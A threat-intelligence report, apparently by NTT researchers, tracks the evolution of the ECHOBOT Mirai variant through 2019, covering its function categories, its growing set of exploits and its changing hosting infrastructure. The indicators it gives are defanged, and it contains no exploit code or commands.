The evolution in ECHOBOT was the subject of research published by NTT’s Cyber Threat Alliance (CTA) partners at Palo Alto’s Unit 42 when they wrote about an evolution of Mirai in June 2019. The new variant added eight new exploits targeting additional Internet of Things (IoT) devices. At the time, the volume of observations from NTT was relatively negligible. However, additional reporting and analysis found added exploitation capabilities as ECHOBOT continued to evolve. Between July and August, NTT observed an increase in traffic related to ECHOBOT. A slight lull in late June through mid-July appears to have been due to the threat actor(s) building more capabilities into the bot, as it now boasts over 60 exploits.
Further research suggests ECHOBOT’s updates have been active for longer than originally thought. NTT mapped out the latest version’s evolution and additional insight into its recent surge of activity and exponential increase in exploit capabilities.
To gain a better understanding of ECHOBOT’s innate functionality, researchers analyzed 17 samples. The objective was to identify how and when new features were added or changed as the bot evolved.
Based on identifiable properties, observations, and other particulars of the samples, analysts identified six operational categories.
- Scan – methods for scanning various products and/or services. In this dataset, not including standard ECHOBOT activities, analysts identified 57 scanning methods.
- Attack – methods for attack generation using various TCP/IP protocols. Analysts identified 11 attack methods in the samples.
- Traffic Generation – methods for generating traffic and/or commands. Analysts identified four methods.
- ECHO – methods specifically related to ECHOBOT. This was consistent with all analyzed binaries.
- Uncategorized – analysts found two methods which did not fit the same convention as the others. They specifically targeted two product lines, however they are implemented differently than the others which fall into the Scan category.
- Flood – analysts identified three functions for providing Denial of Service (DOS) or Distributed Denial of Service (DDOS) attack functionality.
The earliest sample is 5723bff899bfdfe6abe85e95e259ab89, originally submitted to VirusTotal on 20 February 2019. This sample has properties under the following categories:
- Traffic Generation
This is the only binary containing overtly defined traffic generation functionality. It also only uses XMAS scanning for reconnaissance. This activity evolved as the bot matured.
Operational functionality breakdown
All the binaries used the common ECHOBOT named functions. The variations changed substantially with the number of scan options available, in addition to the inclusion of flood or other attack methods.
- 10 – ECHO, Attack, Scan, and Uncategorized
- 4 – ECHO
- 2 – ECHO, Flood
- 1 – Flood, ECHO, Scan, and Traffic Generation
There were between one and 40-plus new scanning additions, depending on the age of the sample, in comparison to the current binaries. Figure 1 shows the relationships between all binaries and the various function categories.
The earliest sighting we have of ECHOBOT was on 20 February 2019. The URLs in the sample contain the hardcoded string “IP” which is not a variable and appears to be used as a placeholder. This initial version also includes a reference to downloading a cryptocurrency miner, which deviates from newer samples of ECHOBOT. As we did not find any other references in the code or online, this may have been a test version submitted to VirusTotal during the development period by the actor(s).
The first publicly hosted samples on 147.135.99[.]111 were uploaded between 2 March and 4 March 2019. This coincides with the earliest mentions of ECHOBOT on Twitter on 3 March 2019. This version appears to have removed the mining behavior and is more in line with the current iterations of ECHOBOT. By 23 March 2019, hosting had switched over to 185.244.25[.]213.
Toward the end of April, we found the first mention of a public attack using ‘ECHOBOT scanner’. This came shortly after its infrastructure shifted hosting to 31.13.195[.]251.
As covered in detail by Palo Alto, new iterations began popping up with new capabilities, including adding eight new exploits and targeting additional IoT devices.
June saw ECHOBOT continue to ramp up its arsenal, now targeting over 25 unique exploits in multiple new samples.
In July, NTT observed samples of ECHOBOT, as well as more Satori and Kowai variants of Mirai, which leverage cryptominers like had been observed with the original ECHOBOT sample. GTIC researchers also identified the location of these malware samples as hosted on open directory servers. Javaop[.]com:4444 was being used as a mining pool for these Mirai variants, but the original use of the website appears to have been mostly idle since 2007.
In August, NTT saw a spike in exploitation attempts dropping the latest downloader titled ‘richard’. The structure was similar to previous ECHOBOT downloaders. This highlighted another infrastructure change as well as a deviation from the previous downloader naming structure.
NTT continues to see attempts to exploit these vulnerabilities and deploy ‘richard’, though the infrastructure is currently offline. We anticipate the ECHOBOT infrastructure will shift again soon to a new IP/ISP as it continues to evolve.
When waging war, the size of your force matters both from a tactical battle point of view and also from a strategic, sustainability angle. While botnets don’t necessarily need to be massive in terms of how many infected hosts are at the disposal of the master - for any meaningful impact to occur the number needs to be significant. There have been significant botnet attacks since the turn of the millennium ranging from Earthlink Spammer in 2000 to Mirai in 2016. As with most brilliant ideas, emulating and modifying an idea is always easier than reinventing the wheel. This appears to also be the case with several Mirai variants, including ECHOBOT.
The actor(s) behind ECHOBOT appear to have given their bot extra propagation ability by indiscriminately exploiting a wide variety of vulnerabilities, new and old, against a wide variety of targets. GTIC continuously monitors ongoing exploitation to track organizational risk, changes in exploitation behavior, or revival of older vulnerabilities and exploits. While we continuously see exploitation attempts of older vulnerabilities, shifts in volume or behavior generally indicate a newer exploitation method, previously unseen binaries in the wild, or a shift in approach which warrants deeper investigation.
The variety of vulnerabilities used suggests attempts to reach as many target systems as possible, with less concern for the actual location of the impacted server. While that may mean that most of these attacks are incidental or opportunistic, it does not make the escalation and evolutions in attacks any less impactful. As potential future evolutions of ECHOBOT develop, NTT researchers will continue to monitor developments in the Mirai variant and updating detections as appropriate.